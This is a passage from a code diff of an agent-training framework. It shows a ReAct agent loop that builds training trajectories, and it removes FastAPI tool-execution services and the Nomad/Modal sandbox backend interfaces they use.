# This is essential for RL data-gen stability; long hangs should be treated as failures (score=0).
timeout_s_raw = os.getenv("ATROPOS_AGENT_CHAT_TIMEOUT_S")
timeout_s_default = 240.0
timeout_s = float(timeout_s_raw) if timeout_s_raw else timeout_s_default
timeout_s = min(timeout_s, 240.0)
wait_every_raw = os.getenv("ATROPOS_DEBUG_AGENT_WAIT_EVERY_S")
wait_every_s = float(wait_every_raw) if wait_every_raw else None
async def _await_call() -> Any:
if not wait_every_s or wait_every_s <= 0:
return await managed.chat_completion(**chat_kwargs)
# Heartbeat mode: wait in chunks without cancelling the underlying request.
# NOTE: do NOT use `asyncio.wait_for(task, timeout=...)` here, because a timeout
# will cancel the task and surface as `CancelledError` on the next loop.
task = asyncio.create_task(managed.chat_completion(**chat_kwargs))
t0 = time.perf_counter()
try:
while True:
done, _pending = await asyncio.wait({task}, timeout=wait_every_s)
if task in done:
return task.result()
waited = time.perf_counter() - t0
print(
f"[AtroposAgent] step={step_num} still waiting for chat_completion... ({waited:.1f}s)",
flush=True,
)
except asyncio.CancelledError:
task.cancel()
raise
try:
return await asyncio.wait_for(_await_call(), timeout=timeout_s)
except asyncio.TimeoutError as e:
print("\n=== ATROPOS_DEBUG_AGENT_CHAT_TIMEOUT ===", flush=True)
print({"step": step_num, "timeout_s": timeout_s}, flush=True)
raise RuntimeError(f"chat_completion timed out after {timeout_s:.1f}s") from e
except asyncio.CancelledError:
# Treat cancellation as a hard failure rather than crashing the whole env run.
# (Atropos/BaseEnv may cancel tasks during shutdown or retries.)
raise RuntimeError("chat_completion cancelled") from None
except Exception as e:
detail: Dict[str, Any] = {
"step": step_num,
"exc_type": type(e).__name__,
"exc_str": str(e),
}
if isinstance(e, httpx.HTTPStatusError):
try:
detail["status_code"] = e.response.status_code
detail["response_text"] = e.response.text[:20_000]
except Exception:
pass
elif isinstance(e, httpx.RequestError):
detail["request"] = repr(getattr(e, "request", None))
print("\n=== ATROPOS_DEBUG_AGENT_CHAT_FAILURE ===", flush=True)
print(detail, flush=True)
raise
async def run(
self,
task: str,
initial_messages: Optional[List[Dict[str, str]]] = None,
) -> AgentResult:
"""
Run the agent on a task using ManagedServer for token tracking.
Args:
task: The task/prompt for the agent
initial_messages: Optional additional context messages
Returns:
AgentResult with the trajectory, final response, and token data
"""
messages = [
{"role": "system", "content": self._build_system_prompt()},
]
if initial_messages:
messages.extend(initial_messages)
messages.append({"role": "user", "content": task})
steps = []
final_response = ""
final_node = None
final_prompt_messages: Optional[List[Dict[str, str]]] = None
last_node = None
last_prompt_messages: Optional[List[Dict[str, str]]] = None
last_response_text: str = ""
# Use ManagedServer for automatic token tracking
async with self._managed() as managed:
for step_num in range(self.config.max_steps):
# ReACT loop iteration here, just call -> tools -> observe until done (no tools called)
try:
# Keep a copy of the prompt messages used for this completion.
# Useful for reconstructing tokens/masks when state tracking is unavailable.
prompt_messages = list(messages)
chat_kwargs: Dict[str, Any] = {"messages": messages, "n": 1}
if self.config.max_tokens is not None:
chat_kwargs["max_tokens"] = self.config.max_tokens
if self.config.temperature is not None:
chat_kwargs["temperature"] = self.config.temperature
t_req = time.perf_counter()
print(
f"[AtroposAgent] step={step_num+1} chat_completion start "
f"(messages={len(messages)}, max_tokens={self.config.max_tokens}, temp={self.config.temperature})",
flush=True,
)
self._debug_dump_request(step_num=step_num + 1, chat_kwargs=chat_kwargs)
response = await self._chat_completion_with_debug(
managed=managed, step_num=step_num + 1, chat_kwargs=chat_kwargs
)
self._debug_dump_response(step_num=step_num + 1, response=response)
response_meta = self._extract_response_metadata(response)
print(
f"[AtroposAgent] step={step_num+1} chat_completion done in {time.perf_counter() - t_req:.2f}s",
flush=True,
)
current_node = None
if hasattr(managed, "get_state"):
state = managed.get_state()
nodes = state.get("nodes", [])
current_node = nodes[-1] if nodes else None
except Exception as e:
return AgentResult(
success=False,
final_response="",
steps=steps,
error=f"Generation error: {str(e)}",
)
msg = response.choices[0].message
# Some OpenAI-compatible servers populate `message.reasoning` and leave `content=""`.
response_text = (msg.content or "") or (getattr(msg, "reasoning", None) or "")
tool_calls = ToolCall.parse_from_text(response_text)
last_node = current_node
last_prompt_messages = prompt_messages
last_response_text = response_text
step_sequence_data = SequenceData.from_sequence_node(current_node) if current_node else None
if step_sequence_data is None:
if response_meta:
# We still want metadata for debugging even if token/logprob state tracking is unavailable.
step_sequence_data = SequenceData(
full_text=response_text,
tokens=[],
masked_tokens=[],
logprobs=[],
metadata=response_meta,
)
else:
merged = dict(response_meta)
node_meta = step_sequence_data.metadata
if isinstance(node_meta, dict):
merged.update(node_meta)
step_sequence_data.metadata = merged or step_sequence_data.metadata
step = AgentStep(
step_number=step_num + 1,
assistant_message=response_text,
tool_calls=tool_calls,
sequence_data=step_sequence_data,
)
if not tool_calls:
steps.append(step)
final_response = response_text
final_node = current_node
final_prompt_messages = prompt_messages
break
messages.append({"role": "assistant", "content": response_text})
tool_responses = []
for call in tool_calls:
result = await self.execute_tool(call)
step.tool_results.append(result)
tool_responses.append(result.to_xml())
if self.config.tool_delay_s > 0:
await asyncio.sleep(self.config.tool_delay_s)
steps.append(step)
responses_text = "\n".join(tool_responses)
# Tool observations are represented as user content with Hermes-style tags.
# This is compatible with most OpenAI-compatible chat APIs and ensures
# tokenizers/chat templates include tool outputs during training.
messages.append({"role": "user", "content": responses_text})
else:
# Reached max steps without completing
# Return a failure result but include the last observed completion so callers can
# record the trajectory (score=0) without triggering retries.
final_response = last_response_text or final_response
final_node = last_node
final_prompt_messages = last_prompt_messages
trajectory_data = None
if final_node:
trajectory_data = SequenceData.from_sequence_node(final_node)
elif final_prompt_messages is not None and self.tokenizer is not None:
if hasattr(self.tokenizer, "apply_chat_template"):
prompt_text = self.tokenizer.apply_chat_template(
final_prompt_messages, tokenize=False, add_generation_prompt=True
)
prompt_tokens = self.tokenizer.encode(prompt_text, add_special_tokens=False)
else:
prompt_text = "\n".join([f"{m['role']}: {m['content']}" for m in final_prompt_messages])
prompt_tokens = self.tokenizer.encode(prompt_text, add_special_tokens=True)
output_tokens = self.tokenizer.encode(final_response, add_special_tokens=False)
tokens = prompt_tokens + output_tokens
masked_tokens = ([-100] * len(prompt_tokens)) + output_tokens
logprobs = ([1.0] * len(prompt_tokens)) + ([0.0] * len(output_tokens))
trajectory_data = SequenceData(
full_text=f"{prompt_text}{final_response}",
tokens=tokens,
masked_tokens=masked_tokens,
logprobs=logprobs,
)
# Preserve response metadata (if any) even on failure trajectories.
try:
if trajectory_data is not None and steps:
last_step = steps[-1]
if last_step.sequence_data and isinstance(last_step.sequence_data.metadata, dict):
trajectory_data.metadata = dict(last_step.sequence_data.metadata)
except Exception:
pass
return AgentResult(
success=False,
final_response=final_response,
steps=steps,
error=f"Reached maximum steps ({self.config.max_steps})",
trajectory_data=trajectory_data,
)
# Build result with trajectory data
trajectory_data = None
if final_node:
trajectory_data = SequenceData.from_sequence_node(final_node)
elif final_prompt_messages is not None and self.tokenizer is not None:
if hasattr(self.tokenizer, "apply_chat_template"):
prompt_text = self.tokenizer.apply_chat_template(
final_prompt_messages, tokenize=False, add_generation_prompt=True
)
prompt_tokens = self.tokenizer.encode(prompt_text, add_special_tokens=False)
else:
prompt_text = "\n".join([f"{m['role']}: {m['content']}" for m in final_prompt_messages])
prompt_tokens = self.tokenizer.encode(prompt_text, add_special_tokens=True)
output_tokens = self.tokenizer.encode(final_response, add_special_tokens=False)
tokens = prompt_tokens + output_tokens
masked_tokens = ([-100] * len(prompt_tokens)) + output_tokens
logprobs = ([1.0] * len(prompt_tokens)) + ([0.0] * len(output_tokens))
trajectory_data = SequenceData(
full_text=f"{prompt_text}{final_response}",
tokens=tokens,
masked_tokens=masked_tokens,
logprobs=logprobs,
)
# Ensure trajectory_data carries the most recent metadata we observed (if any).
try:
if trajectory_data is not None and steps:
last_step = steps[-1]
if last_step.sequence_data and isinstance(last_step.sequence_data.metadata, dict):
trajectory_data.metadata = dict(last_step.sequence_data.metadata)
except Exception:
pass
return AgentResult(
success=True,
final_response=final_response,
steps=steps,
trajectory_data=trajectory_data,
)
async def run_single_turn(
self,
messages: List[Dict[str, str]],
execute_tools: bool = True,
) -> tuple[str, List[ToolResult], Optional[SequenceData]]:
"""
Run a single turn of the agent (one LLM call + tool execution).
This is useful for integration with BaseEnv where you want more
control over the loop.
Args:
messages: The conversation history
execute_tools: Whether to execute parsed tool calls
Returns:
Tuple of (response_text, tool_results, sequence_data)
"""
async with self._managed() as managed:
chat_kwargs: Dict[str, Any] = {"messages": messages, "n": 1}
if self.config.max_tokens is not None:
chat_kwargs["max_tokens"] = self.config.max_tokens
if self.config.temperature is not None:
chat_kwargs["temperature"] = self.config.temperature
self._debug_dump_request(step_num=1, chat_kwargs=chat_kwargs)
response = await self._chat_completion_with_debug(managed=managed, step_num=1, chat_kwargs=chat_kwargs)
self._debug_dump_response(step_num=1, response=response)
current_node = None
if hasattr(managed, "get_state"):
state = managed.get_state()
nodes = state.get("nodes", [])
current_node = nodes[-1] if nodes else None
msg = response.choices[0].message
response_text = (msg.content or "") or (getattr(msg, "reasoning", None) or "")
tool_results = []
if execute_tools:
tool_calls = ToolCall.parse_from_text(response_text)
for call in tool_calls:
result = await self.execute_tool(call)
tool_results.append(result)
sequence_data = SequenceData.from_sequence_node(current_node) if current_node else None
return response_text, tool_results, sequence_data
class _DirectChatCompletionClient:
"""
Minimal stand-in for ManagedServer that calls the OpenAI-compatible endpoint directly.
This is for isolating issues where `ManagedServer.chat_completion()` hangs or misbehaves.
It intentionally does NOT do token/logprob tracking.
"""
def __init__(self, server: Any):
self._server = server
def _server_config(self) -> tuple[str, str, str]:
# ServerManager case: first configured server.
servers = getattr(self._server, "servers", None)
if isinstance(servers, list) and servers:
s0 = servers[0]
cfg = getattr(s0, "config", None)
base_url = getattr(cfg, "base_url", None) or getattr(s0, "base_url", None)
api_key = getattr(cfg, "api_key", None) or getattr(s0, "api_key", None)
model = getattr(cfg, "model_name", None) or getattr(s0, "model_name", None)
if isinstance(base_url, str) and isinstance(api_key, str) and isinstance(model, str):
return base_url.rstrip("/"), api_key, model
# APIServer-like fallback.
base_url = getattr(self._server, "base_url", None)
api_key = getattr(self._server, "api_key", None)
model = getattr(self._server, "model_name", None) or getattr(self._server, "model", None)
if isinstance(base_url, str) and isinstance(api_key, str) and isinstance(model, str):
return base_url.rstrip("/"), api_key, model
raise RuntimeError("Unable to resolve server base_url/api_key/model for direct chat completion")
async def chat_completion(self, *, messages: List[Dict[str, str]], n: int = 1, **kwargs: Any) -> Any:
base_url, api_key, model = self._server_config()
url = f"{base_url}/chat/completions"
payload: Dict[str, Any] = {
"model": model,
"messages": messages,
"n": n,
}
# Pass through common generation kwargs.
for k in ("max_tokens", "temperature", "top_p", "presence_penalty", "frequency_penalty", "stop"):
if k in kwargs and kwargs[k] is not None:
payload[k] = kwargs[k]
timeout_s = float(os.getenv("ATROPOS_DIRECT_REQUEST_TIMEOUT_S") or "120")
print(f"[AtroposAgent] DIRECT chat_completion POST {url} (timeout={timeout_s}s)", flush=True)
async with httpx.AsyncClient(timeout=timeout_s) as client:
resp = await client.post(
url,
headers={"Authorization": f"Bearer {api_key}", "Content-Type": "application/json"},
json=payload,
)
resp.raise_for_status()
data = resp.json()
# Return a very small object compatible with the code paths that read
# `response.choices[0].message.content`.
class _Msg:
def __init__(self, d: Dict[str, Any]):
self.content = d.get("content")
self.reasoning = d.get("reasoning")
class _Choice:
def __init__(self, d: Dict[str, Any]):
self.message = _Msg(d.get("message") or {})
class _Resp:
def __init__(self, d: Dict[str, Any]):
self._d = d
self.choices = [_Choice(c) for c in (d.get("choices") or [])]
def model_dump(self) -> Dict[str, Any]:
return self._d
return _Resp(data)

View File

@@ -1,6 +0,0 @@
"""
FastAPI services for atropos-agent.
- tool_executor_server: queued/batched sandbox tool execution (Phase 4)
"""

View File

@@ -1,254 +0,0 @@
"""
Tool Executor API (Phase 4)
This service provides a queued, batched execution layer on top of a ToolBackend.
It mirrors the stateful FastAPI + app.state pattern used in:
atropos/atroposlib/api/server.py
Run (dev):
uv run uvicorn atropos_agent.api.tool_executor_server:app --host 0.0.0.0 --port 9001
"""
from __future__ import annotations
import os
from typing import Any, Dict, Optional
from pathlib import Path
from fastapi import FastAPI, Header, HTTPException, status
from pydantic import BaseModel, Field
from ..backends.nomad_backend import NomadBackendConfig, NomadToolBackend
from ..tools import ToolRegistry, build_tool_registry
from ..tools.base import (
ArtifactArchiveRequestPayload,
ArtifactArchiveResponsePayload,
ArtifactListRequestPayload,
ArtifactListResponsePayload,
ArtifactReadRequestPayload,
ArtifactReadResponsePayload,
ToolExecutorExecuteRequest,
ToolExecutorReleaseRequest,
ToolResultPayload,
)
from ..tools.tool_executor import ToolExecutor, ToolExecutorConfig
class ToolExecutorServerConfig(BaseModel):
nomad_address: str = Field(default="http://localhost:4646")
job_id: str = Field(default="atropos-sandbox-tool-executor")
image: str = Field(default="atropos-sandbox:local")
slots_per_container: int = Field(default=10)
min_containers: int = Field(default=1)
max_containers: int = Field(default=10)
privileged: bool = Field(default=False)
acquire_timeout_s: float = Field(default=30.0)
batch_window_ms: int = Field(default=20)
max_batch_size: int = Field(default=200)
allow_network: bool = Field(default=True)
tool_server_url: Optional[str] = Field(default=None)
tool_server_token: Optional[str] = Field(default=None)
token: Optional[str] = Field(default=None, description="Bearer token required for requests (optional in dev).")
purge_job_on_shutdown: bool = Field(default=True)
@classmethod
def from_env(cls) -> "ToolExecutorServerConfig":
# In dev, prefer loading secrets/config from the repo-local `.env` (not committed).
try:
from dotenv import load_dotenv # type: ignore
except Exception: # pragma: no cover
load_dotenv = None # type: ignore[assignment]
if load_dotenv is not None:
env_path = Path(__file__).resolve().parents[2] / ".env"
if env_path.exists():
load_dotenv(dotenv_path=env_path)
def _get_bool(name: str, default: bool) -> bool:
raw = os.getenv(name)
if raw is None:
return default
return raw.strip().lower() in {"1", "true", "yes", "y", "on"}
return cls(
nomad_address=os.getenv("TOOL_EXECUTOR_NOMAD_ADDRESS", "http://localhost:4646"),
job_id=os.getenv("TOOL_EXECUTOR_JOB_ID", "atropos-sandbox-tool-executor"),
image=os.getenv("TOOL_EXECUTOR_IMAGE", "atropos-sandbox:local"),
slots_per_container=int(os.getenv("TOOL_EXECUTOR_SLOTS", "10")),
min_containers=int(os.getenv("TOOL_EXECUTOR_MIN_CONTAINERS", "1")),
max_containers=int(os.getenv("TOOL_EXECUTOR_MAX_CONTAINERS", "10")),
privileged=_get_bool("TOOL_EXECUTOR_PRIVILEGED", False),
acquire_timeout_s=float(os.getenv("TOOL_EXECUTOR_ACQUIRE_TIMEOUT_S", "30.0")),
batch_window_ms=int(os.getenv("TOOL_EXECUTOR_BATCH_WINDOW_MS", "20")),
max_batch_size=int(os.getenv("TOOL_EXECUTOR_MAX_BATCH_SIZE", "200")),
allow_network=_get_bool("TOOL_EXECUTOR_ALLOW_NETWORK", True),
tool_server_url=os.getenv("TOOL_EXECUTOR_TOOL_SERVER_URL") or None,
tool_server_token=os.getenv("TOOL_EXECUTOR_TOOL_SERVER_TOKEN") or None,
token=os.getenv("TOOL_EXECUTOR_TOKEN") or None,
purge_job_on_shutdown=_get_bool("TOOL_EXECUTOR_PURGE_JOB_ON_SHUTDOWN", True),
)
app = FastAPI(title="Atropos-Agent Tool Executor")
@app.get("/")
async def root() -> Dict[str, str]:
return {"message": "Atropos-Agent Tool Executor"}
def _check_auth(cfg: ToolExecutorServerConfig, authorization: Optional[str]) -> None:
if not cfg.token:
return
if not authorization:
raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED, detail="Missing Authorization header")
if not authorization.lower().startswith("bearer "):
raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED, detail="Invalid Authorization header")
token = authorization.split(" ", 1)[1].strip()
if token != cfg.token:
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail="Invalid token")
@app.on_event("startup")
async def _startup() -> None:
cfg = ToolExecutorServerConfig.from_env()
# Default to Atropos "full" tool surface: sandbox + external (if tool_server_url provided).
tools: ToolRegistry = build_tool_registry(
enabled_toolsets=["full"],
disabled_toolsets=None,
tool_server_url=cfg.tool_server_url,
)
backend = NomadToolBackend(
NomadBackendConfig(
nomad_address=cfg.nomad_address,
sandbox_job_id=cfg.job_id,
sandbox_image=cfg.image,
slots_per_container=cfg.slots_per_container,
min_containers=cfg.min_containers,
max_containers=cfg.max_containers,
privileged=cfg.privileged,
acquire_timeout_s=cfg.acquire_timeout_s,
purge_job_on_start=False,
)
)
await backend.start()
executor = ToolExecutor(
backend=backend,
tools=tools,
config=ToolExecutorConfig(
batch_window_ms=cfg.batch_window_ms,
max_batch_size=cfg.max_batch_size,
allow_network=cfg.allow_network,
tool_server_url=cfg.tool_server_url,
tool_server_token=cfg.tool_server_token,
),
)
await executor.start()
app.state.cfg = cfg
app.state.backend = backend
app.state.executor = executor
@app.on_event("shutdown")
async def _shutdown() -> None:
executor: Optional[ToolExecutor] = getattr(app.state, "executor", None)
backend: Optional[NomadToolBackend] = getattr(app.state, "backend", None)
cfg: Optional[ToolExecutorServerConfig] = getattr(app.state, "cfg", None)
if executor is not None:
await executor.close()
if backend is not None:
await backend.stop(purge=bool(cfg.purge_job_on_shutdown) if cfg else False)
@app.get("/health")
async def health() -> Dict[str, Any]:
return {"status": "ok"}
@app.get("/status")
async def status_endpoint() -> Dict[str, Any]:
executor: ToolExecutor = app.state.executor
backend: NomadToolBackend = app.state.backend
return {
"queue_size": executor.queue_size(),
"total_requests": executor.total_requests,
"total_errors": executor.total_errors,
"pool": backend.get_stats(),
}
@app.post("/execute", response_model=ToolResultPayload)
async def execute_tool(
req: ToolExecutorExecuteRequest,
authorization: Optional[str] = Header(default=None),
status_code: int = status.HTTP_200_OK, # noqa: B008
) -> ToolResultPayload:
cfg: ToolExecutorServerConfig = app.state.cfg
_check_auth(cfg, authorization)
executor: ToolExecutor = app.state.executor
result = await executor.execute(
trajectory_id=req.trajectory_id,
call=req.tool.to_tool_call(),
timeout_s=req.timeout_s,
)
return ToolResultPayload.from_tool_result(result)
@app.post("/release")
async def release_trajectory(
req: ToolExecutorReleaseRequest,
authorization: Optional[str] = Header(default=None),
) -> Dict[str, Any]:
cfg: ToolExecutorServerConfig = app.state.cfg
_check_auth(cfg, authorization)
executor: ToolExecutor = app.state.executor
await executor.release_trajectory(req.trajectory_id, reset_workspace=req.reset_workspace)
return {"status": "ok"}
@app.post("/artifacts/read", response_model=ArtifactReadResponsePayload)
async def artifacts_read(
req: ArtifactReadRequestPayload,
authorization: Optional[str] = Header(default=None),
) -> ArtifactReadResponsePayload:
cfg: ToolExecutorServerConfig = app.state.cfg
_check_auth(cfg, authorization)
executor: ToolExecutor = app.state.executor
return await executor.read_artifact(req)
@app.post("/artifacts/list", response_model=ArtifactListResponsePayload)
async def artifacts_list(
req: ArtifactListRequestPayload,
authorization: Optional[str] = Header(default=None),
) -> ArtifactListResponsePayload:
cfg: ToolExecutorServerConfig = app.state.cfg
_check_auth(cfg, authorization)
executor: ToolExecutor = app.state.executor
return await executor.list_artifacts(req)
@app.post("/artifacts/archive", response_model=ArtifactArchiveResponsePayload)
async def artifacts_archive(
req: ArtifactArchiveRequestPayload,
authorization: Optional[str] = Header(default=None),
) -> ArtifactArchiveResponsePayload:
cfg: ToolExecutorServerConfig = app.state.cfg
_check_auth(cfg, authorization)
executor: ToolExecutor = app.state.executor
return await executor.archive_artifacts(req)

View File

@@ -1,140 +0,0 @@
"""
External ToolServer (Phase 4.5+).
This server executes tools that must NOT run inside the sandbox, typically
because they require credentials or access to external services.
Run (dev):
uv run uvicorn atropos_agent.api.tool_server:app --host 0.0.0.0 --port 9002
"""
from __future__ import annotations
import asyncio
import os
import inspect
from typing import Any, Dict, List, Optional
from pathlib import Path
from fastapi import FastAPI, Header, HTTPException, status
from pydantic import BaseModel, Field
from ..tools import ToolRegistry, build_tool_registry
from ..tools.base import ToolResultPayload, ToolServerExecuteRequest
class ToolServerConfig(BaseModel):
token: Optional[str] = Field(
default=None,
description="Bearer token required for requests (optional in dev).",
)
max_concurrency: int = Field(default=16, ge=1, description="Max concurrent tool executions.")
@classmethod
def from_env(cls) -> "ToolServerConfig":
# In dev, prefer loading secrets from the repo-local `.env` (not committed).
try:
from dotenv import load_dotenv # type: ignore
except Exception: # pragma: no cover
load_dotenv = None # type: ignore[assignment]
if load_dotenv is not None:
env_path = Path(__file__).resolve().parents[2] / ".env"
if env_path.exists():
load_dotenv(dotenv_path=env_path)
token = os.getenv("TOOL_SERVER_TOKEN") or None
max_concurrency = int(os.getenv("TOOL_SERVER_MAX_CONCURRENCY", "16"))
return cls(token=token, max_concurrency=max_concurrency)
app = FastAPI(title="Atropos-Agent Tool Server")
@app.get("/")
async def root() -> Dict[str, str]:
return {"message": "Atropos-Agent Tool Server"}
@app.on_event("startup")
async def _startup() -> None:
cfg = ToolServerConfig.from_env()
# External-only registry. It will only include tools that are enabled by toolsets and
# whose Hermes requirements/keys are satisfied in this process.
tools: ToolRegistry = build_tool_registry(
enabled_toolsets=["all"],
disabled_toolsets=["terminal", "sandbox", "filesystem", "terminal_stateful", "default"],
tool_server_url="enabled",
)
app.state.cfg = cfg
app.state.tools = tools
app.state.semaphore = asyncio.Semaphore(cfg.max_concurrency)
@app.get("/health")
async def health() -> Dict[str, Any]:
return {"status": "ok"}
@app.get("/tools")
async def list_tools() -> Dict[str, Any]:
tools: ToolRegistry = app.state.tools
return {"tools": [s.to_dict() for s in tools.get_schemas()]}
def _check_auth(cfg: ToolServerConfig, authorization: Optional[str]) -> None:
if not cfg.token:
return
if not authorization:
raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED, detail="Missing Authorization header")
if not authorization.lower().startswith("bearer "):
raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED, detail="Invalid Authorization header")
token = authorization.split(" ", 1)[1].strip()
if token != cfg.token:
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail="Invalid token")
@app.post("/execute", response_model=ToolResultPayload)
async def execute_tool(
req: ToolServerExecuteRequest,
authorization: Optional[str] = Header(default=None),
) -> ToolResultPayload:
cfg: ToolServerConfig = app.state.cfg
_check_auth(cfg, authorization)
tools: ToolRegistry = app.state.tools
sem: asyncio.Semaphore = app.state.semaphore
tool = tools.get(req.tool.name)
if tool is None:
return ToolResultPayload(
success=False,
error=f"Unknown tool: {req.tool.name}",
uniq_id=req.tool.uniq_id,
)
async with sem:
try:
kwargs = dict(req.tool.arguments)
sig = inspect.signature(tool.execute).parameters
# Some tools can benefit from extra context.
if req.trajectory_id and "trajectory_id" in sig:
kwargs["trajectory_id"] = req.trajectory_id
if req.slot_id and "slot_id" in sig:
kwargs["slot_id"] = req.slot_id
if req.container_addr and "container_addr" in sig:
kwargs["container_addr"] = req.container_addr
if "task_id" in sig:
kwargs["task_id"] = req.trajectory_id
result = await tool.execute(**kwargs)
except Exception as e:
return ToolResultPayload(
success=False,
error=f"Tool execution error: {e}",
uniq_id=req.tool.uniq_id,
)
if result.uniq_id is None:
result.uniq_id = req.tool.uniq_id
return ToolResultPayload.from_tool_result(result)

View File

@@ -1,27 +0,0 @@
from __future__ import annotations
from typing import Any
from .base import ToolBackend
from .modal_backend import ModalSandboxConfig, ModalToolBackend
from .nomad_backend import NomadBackendConfig, NomadToolBackend
def create_tool_backend(cfg: Any) -> ToolBackend:
mode = str(getattr(cfg, "tool_pool_mode", "nomad")).strip().lower()
if mode == "nomad":
return NomadToolBackend(NomadBackendConfig.from_agent_env_config(cfg))
if mode == "modal":
return ModalToolBackend(ModalSandboxConfig.from_agent_env_config(cfg))
raise ValueError(f"Unknown tool_pool_mode: {mode}")
__all__ = [
"ToolBackend",
"create_tool_backend",
"NomadBackendConfig",
"NomadToolBackend",
"ModalSandboxConfig",
"ModalToolBackend",
]

View File

@@ -1,89 +0,0 @@
"""
Backend interfaces for AgentEnv tool execution.
The goal of this module is to decouple ToolExecutor / AgentEnv from any single
execution backend (Nomad/Docker today; Modal later).
"""
from __future__ import annotations
from typing import Any, Dict, List, Optional, Protocol, Tuple
from ..slots.executor import ExecutionResult
from ..slots.slot import Slot
class ToolBackend(Protocol):
"""
Minimal interface required by ToolExecutor.
Backends provide:
- lifecycle (start/stop)
- slot acquisition/release (workspace affinity)
- batched tool execution across slots
- optional artifact helpers (for env verification / demos)
"""
@property
def default_timeout_s(self) -> Optional[float]:
"""Default sandbox execution timeout in seconds (if any)."""
async def start(self) -> None:
"""Start the backend (provision workers/containers, health checks, etc)."""
async def stop(self, *, purge: bool = False) -> None:
"""Stop the backend and optionally purge remote resources."""
async def acquire(self, trajectory_id: Optional[str] = None) -> Slot:
"""Acquire a slot for a trajectory (workspace affinity)."""
async def release(self, slot: Slot, *, reset_workspace: bool = False) -> None:
"""Release a slot back to the pool."""
async def execute_batch(
self,
requests: List[Tuple[Slot, str, Dict[str, Any]]],
*,
timeout_s: Optional[float] = None,
) -> List[ExecutionResult]:
"""Execute a batch of sandbox tool calls and return results in order."""
# ---------------------------------------------------------------------
# Optional artifact helpers (supported by the Nomad sandbox-server today)
# ---------------------------------------------------------------------
async def read_artifact(
self,
slot: Slot,
path: str,
*,
encoding: str = "text",
max_bytes: Optional[int] = None,
include_sha256: bool = False,
timeout_s: Optional[float] = None,
) -> Dict[str, Any]:
raise NotImplementedError
async def list_artifacts(
self,
slot: Slot,
path: str = ".",
*,
recursive: bool = False,
max_entries: Optional[int] = None,
timeout_s: Optional[float] = None,
) -> Dict[str, Any]:
raise NotImplementedError
async def archive_artifacts(
self,
slot: Slot,
path: str = ".",
*,
archive_format: str = "tar.gz",
max_bytes: Optional[int] = None,
max_entries: Optional[int] = None,
timeout_s: Optional[float] = None,
) -> Dict[str, Any]:
raise NotImplementedError

File diff suppressed because it is too large Load Diff

View File

@@ -1,156 +0,0 @@
"""
Nomad/Docker tool backend.
This backend is the current default for AgentEnv: it provisions a Nomad job
running `sandbox_server.py` and multiplexes stateless slots inside each container.
"""
from __future__ import annotations
from dataclasses import dataclass
from typing import Any, Dict, List, Optional, Tuple
from ..slots import Slot, SlotPool, SlotPoolConfig
from ..slots.executor import ExecutionResult
from .base import ToolBackend
@dataclass(frozen=True)
class NomadBackendConfig:
nomad_address: str
sandbox_job_id: str
sandbox_image: str
slots_per_container: int
min_containers: int
max_containers: int
privileged: bool
acquire_timeout_s: float
purge_job_on_start: bool
# Driver selection: "docker" or "singularity"
driver: str = "docker"
# Path to .sif file for singularity driver (required if driver="singularity")
singularity_image: Optional[str] = None
@classmethod
def from_agent_env_config(cls, cfg: Any) -> "NomadBackendConfig":
return cls(
nomad_address=str(getattr(cfg, "nomad_address")),
sandbox_job_id=str(getattr(cfg, "sandbox_job_id")),
sandbox_image=str(getattr(cfg, "sandbox_image")),
slots_per_container=int(getattr(cfg, "slots_per_container")),
min_containers=int(getattr(cfg, "min_containers")),
max_containers=int(getattr(cfg, "max_containers")),
privileged=bool(getattr(cfg, "privileged")),
acquire_timeout_s=float(getattr(cfg, "acquire_timeout_s")),
purge_job_on_start=bool(getattr(cfg, "purge_job_on_start", False)),
driver=str(getattr(cfg, "driver", "docker")),
singularity_image=getattr(cfg, "singularity_image", None),
)
class NomadToolBackend(ToolBackend):
def __init__(self, config: NomadBackendConfig):
self.config = config
self.pool = SlotPool(
SlotPoolConfig(
nomad_address=config.nomad_address,
job_id=config.sandbox_job_id,
image=config.sandbox_image,
slots_per_container=config.slots_per_container,
min_containers=config.min_containers,
max_containers=config.max_containers,
privileged=config.privileged,
acquire_timeout=config.acquire_timeout_s,
purge_job_on_start=bool(config.purge_job_on_start),
driver=config.driver,
singularity_image=config.singularity_image,
)
)
@property
def default_timeout_s(self) -> Optional[float]:
t = getattr(self.pool.executor, "timeout", None)
total = getattr(t, "total", None)
try:
return float(total) if total is not None else None
except Exception:
return None
async def start(self) -> None:
await self.pool.start()
async def stop(self, *, purge: bool = False) -> None:
await self.pool.stop(purge_job=purge)
async def acquire(self, trajectory_id: Optional[str] = None) -> Slot:
return await self.pool.acquire(trajectory_id)
async def release(self, slot: Slot, *, reset_workspace: bool = False) -> None:
await self.pool.release(slot, reset_workspace=reset_workspace)
async def execute_batch(
self,
requests: List[Tuple[Slot, str, Dict[str, Any]]],
*,
timeout_s: Optional[float] = None,
) -> List[ExecutionResult]:
return await self.pool.execute_batch(requests, timeout=timeout_s)
async def read_artifact(
self,
slot: Slot,
path: str,
*,
encoding: str = "text",
max_bytes: Optional[int] = None,
include_sha256: bool = False,
timeout_s: Optional[float] = None,
) -> Dict[str, Any]:
return await self.pool.executor.read_artifact(
slot,
path,
encoding=encoding,
max_bytes=max_bytes,
include_sha256=include_sha256,
timeout=timeout_s,
)
async def list_artifacts(
self,
slot: Slot,
path: str = ".",
*,
recursive: bool = False,
max_entries: Optional[int] = None,
timeout_s: Optional[float] = None,
) -> Dict[str, Any]:
return await self.pool.executor.list_artifacts(
slot,
path,
recursive=recursive,
max_entries=max_entries,
timeout=timeout_s,
)
async def archive_artifacts(
self,
slot: Slot,
path: str = ".",
*,
archive_format: str = "tar.gz",
max_bytes: Optional[int] = None,
max_entries: Optional[int] = None,
timeout_s: Optional[float] = None,
) -> Dict[str, Any]:
return await self.pool.executor.archive_artifacts(
slot,
path,
archive_format=archive_format,
max_bytes=max_bytes,
max_entries=max_entries,
timeout=timeout_s,
)
def get_stats(self) -> Dict[str, Any]:
return self.pool.get_stats()

View File

@@ -1,18 +0,0 @@
"""
Environment implementations for atropos-agent.
NOTE: AgentEnv is the OLD environment system, replaced by
environments/hermes_base_env.py (HermesAgentBaseEnv).
Import is lazy to avoid pulling in deleted dependencies.
"""
def __getattr__(name):
"""Lazy import to avoid breaking when old dependencies are removed."""
